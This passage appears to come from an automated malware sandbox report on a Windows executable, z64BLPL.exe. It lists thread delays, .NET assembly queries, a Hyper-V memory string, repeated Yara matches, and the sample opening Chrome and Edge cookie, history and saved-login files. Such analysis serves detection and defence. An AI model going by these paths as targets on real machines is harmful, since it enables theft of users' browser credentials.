Source: C:\Users\user\Desktop\z64BLPL.exe |
Thread delayed: delay time: 596765 |
Jump to behavior |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Thread delayed: delay time: 596656 |
Jump to behavior |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Thread delayed: delay time: 596547 |
Jump to behavior |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Thread delayed: delay time: 596437 |
Jump to behavior |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Thread delayed: delay time: 596328 |
Jump to behavior |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Thread delayed: delay time: 596217 |
Jump to behavior |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Thread delayed: delay time: 596109 |
Jump to behavior |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Thread delayed: delay time: 596000 |
Jump to behavior |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Thread delayed: delay time: 595890 |
Jump to behavior |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Thread delayed: delay time: 595781 |
Jump to behavior |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Thread delayed: delay time: 595672 |
Jump to behavior |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Thread delayed: delay time: 595547 |
Jump to behavior |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Thread delayed: delay time: 595437 |
Jump to behavior |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Thread delayed: delay time: 595328 |
Jump to behavior |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Thread delayed: delay time: 595218 |
Jump to behavior |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Thread delayed: delay time: 595109 |
Jump to behavior |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Thread delayed: delay time: 594993 |
Jump to behavior |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Thread delayed: delay time: 594890 |
Jump to behavior |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Thread delayed: delay time: 594781 |
Jump to behavior |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Thread delayed: delay time: 594671 |
Jump to behavior |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Thread delayed: delay time: 594562 |
Jump to behavior |
Source: z64BLPL.exe, 00000000.00000002.4120472413.0000000000DA2000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllCult |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Queries volume information: C:\Users\user\Desktop\z64BLPL.exe VolumeInformation |
Jump to behavior |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation |
Jump to behavior |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation |
Jump to behavior |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation |
Jump to behavior |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation |
Jump to behavior |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation |
Jump to behavior |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation |
Jump to behavior |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation |
Jump to behavior |
Source: Yara match |
File source: z64BLPL.exe, type: SAMPLE |
Source: Yara match |
File source: 0.0.z64BLPL.exe.690000.0.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 00000000.00000000.1673795940.0000000000692000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY |
Source: Yara match |
File source: Process Memory Space: z64BLPL.exe PID: 7268, type: MEMORYSTR |
Source: Yara match |
File source: z64BLPL.exe, type: SAMPLE |
Source: Yara match |
File source: 0.0.z64BLPL.exe.690000.0.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 00000000.00000000.1673795940.0000000000692000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000000.00000002.4120925537.0000000002B1D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: Process Memory Space: z64BLPL.exe PID: 7268, type: MEMORYSTR |
Source: C:\Users\user\Desktop\z64BLPL.exe |
File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History |
Jump to behavior |
Source: C:\Users\user\Desktop\z64BLPL.exe |
File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies |
Jump to behavior |
Source: C:\Users\user\Desktop\z64BLPL.exe |
File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data |
Jump to behavior |
Source: C:\Users\user\Desktop\z64BLPL.exe |
File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data |
Jump to behavior |
Source: C:\Users\user\Desktop\z64BLPL.exe |
File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History |
Jump to behavior |
Source: C:\Users\user\Desktop\z64BLPL.exe |
File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data |
Jump to behavior |
Source: C:\Users\user\Desktop\z64BLPL.exe |
File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites |
Jump to behavior |
Source: Yara match |
File source: z64BLPL.exe, type: SAMPLE |
Source: Yara match |
File source: 0.0.z64BLPL.exe.690000.0.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 00000000.00000000.1673795940.0000000000692000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000000.00000002.4120925537.0000000002B1D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: Process Memory Space: z64BLPL.exe PID: 7268, type: MEMORYSTR |
Source: Yara match |
File source: z64BLPL.exe, type: SAMPLE |
Source: Yara match |
File source: 0.0.z64BLPL.exe.690000.0.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 00000000.00000000.1673795940.0000000000692000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY |
Source: Yara match |
File source: Process Memory Space: z64BLPL.exe PID: 7268, type: MEMORYSTR |
Source: Yara match |
File source: z64BLPL.exe, type: SAMPLE |
Source: Yara match |
File source: 0.0.z64BLPL.exe.690000.0.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 00000000.00000000.1673795940.0000000000692000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000000.00000002.4120925537.0000000002B1D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: Process Memory Space: z64BLPL.exe PID: 7268, type: MEMORYSTR |